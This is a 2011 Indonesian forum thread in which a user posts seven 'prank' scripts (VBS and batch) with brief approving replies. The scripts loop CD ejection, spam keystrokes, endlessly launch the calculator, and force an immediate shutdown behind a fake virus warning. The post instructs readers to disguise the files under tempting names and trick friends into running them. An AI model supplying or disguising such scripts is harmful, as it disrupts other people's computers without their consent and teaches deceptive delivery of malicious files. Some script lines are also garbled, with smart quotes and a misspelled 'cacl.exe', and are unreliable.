Great Indonesian Forum
Harap Login terlebih dahulu

Join the forum, it's quick and easy

Great Indonesian Forum
Harap Login terlebih dahulu
Great Indonesian Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Log in

I forgot my password

Top posters
dodolan (115)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
Aziz (37)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
HaQua (25)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
Raxion (12)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
bagas_fahreza (6)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
BlackJosh (5)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
rizky_indrawan (5)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
~ nissanote ~ (5)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
Moderator (2)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 
Sarahwalker (2)
[Tutor] Jail using a notepad I_vote_lcap[Tutor] Jail using a notepad I_voting_bar[Tutor] Jail using a notepad I_vote_rcap 

Latest topics
» [SALE]HDD External New + isi
[Tutor] Jail using a notepad EmptyFri Jun 10, 2022 4:18 pm by dodolan

» NONOLIVE !!
[Tutor] Jail using a notepad EmptyWed May 04, 2016 8:59 pm by HaQua

» Nonolive live streaming apaan sih?
[Tutor] Jail using a notepad EmptyMon May 02, 2016 5:58 pm by Sarahwalker

» RENDANG no.11 dari 50 makanan TERENAK di DUNIA
[Tutor] Jail using a notepad EmptySun Jul 31, 2011 11:19 am by Aziz

» Pro Evolution Soccer 2011
[Tutor] Jail using a notepad EmptySun Jul 24, 2011 7:25 am by Aziz

» Tips Sehat Saat di Depan Computer
[Tutor] Jail using a notepad EmptyFri Jul 22, 2011 2:47 pm by Aziz

» [NOTICE] Penghapusan Thread / Replay Thread Bermasalah
[Tutor] Jail using a notepad EmptyMon Jul 04, 2011 8:17 am by Aziz

» Lounge ~Talking Everything~
[Tutor] Jail using a notepad EmptySun Jul 03, 2011 2:07 pm by Aziz

» I AM NUMBER 4
[Tutor] Jail using a notepad EmptySun Jul 03, 2011 1:30 pm by Aziz

Navigation
 Portal
 Indeks
 Anggota
 Profil
 FAQ
 Pencarian

[Tutor] Jail using a notepad

3 posters

Go down

[Tutor] Jail using a notepad Empty [Tutor] Jail using a notepad

Post  HaQua Fri Jun 03, 2011 5:09 pm


Sekarang macam-macam script jail:

1. Meng-eject Drive CD-Room Terus-Menerus

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

2.Tombol Enter Terus-terusan Aktif

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

3.Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks! (BISA KALIAN EDITE SENDIRI KATA2NYA)

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

4.Iseng Dengan Backspace (Jika menekan tombol Bacspace akan keluar tulisan "Maaf anda harus mengulang kembali" atau bisa dibuat semau kita.)

MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

5.Iseng Dengan Membuka Calculator Terus Menerus

@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top

6.Iseng dengan Keyboard (tampil tulisan yang kita inginkan) nah ini yg paling kocak neh

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

7.Iseng Dengan Shutdown Komputer

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0


Semua trik di atas
(No. 1 sampai 7 di simpan / save menggunakan .VBS )
(misalnya pake nama yang bikin penasaran, misalnya: Cewe_Cantik.VBS)<

dan save as type-nya pake all files, setelah itu berikan ke temen yang mau kita isengin....!

Nah nti temen pasti penasaran dan buka notepad itu, Jreng.....jreng... komputer langsung mengikuti perintah sesuai judul di atas!
HaQua
HaQua
Dewa Banned
Dewa Banned

Jumlah posting : 25
Join date : 2011-05-29

http://celestialgaming.co.cc

Back to top Go down

[Tutor] Jail using a notepad Empty Re: [Tutor] Jail using a notepad

Post  Aziz Sun Jun 19, 2011 10:51 am

Nice rel

Aziz
Admin
Admin

Jumlah posting : 37
Join date : 2011-05-27
Age : 27
Lokasi : Semarang,Indonesia

https://great.indonesianforum.net

Back to top Go down

[Tutor] Jail using a notepad Empty Re: [Tutor] Jail using a notepad

Post  Moderator Thu Jun 23, 2011 5:26 pm

sip kk admin nice share [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823 [Tutor] Jail using a notepad 4097009823
Moderator
Moderator
Moderator GIF
Moderator GIF

Jumlah posting : 2
Join date : 2011-06-09
Age : 36
Lokasi : Server Database

Back to top Go down

[Tutor] Jail using a notepad Empty Re: [Tutor] Jail using a notepad

Post  Aziz Wed Jun 29, 2011 7:07 am

Btw Copas ga ni ? [Tutor] Jail using a notepad 564806742 [Tutor] Jail using a notepad 564806742

Aziz
Admin
Admin

Jumlah posting : 37
Join date : 2011-05-27
Age : 27
Lokasi : Semarang,Indonesia

https://great.indonesianforum.net

Back to top Go down

[Tutor] Jail using a notepad Empty Re: [Tutor] Jail using a notepad

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum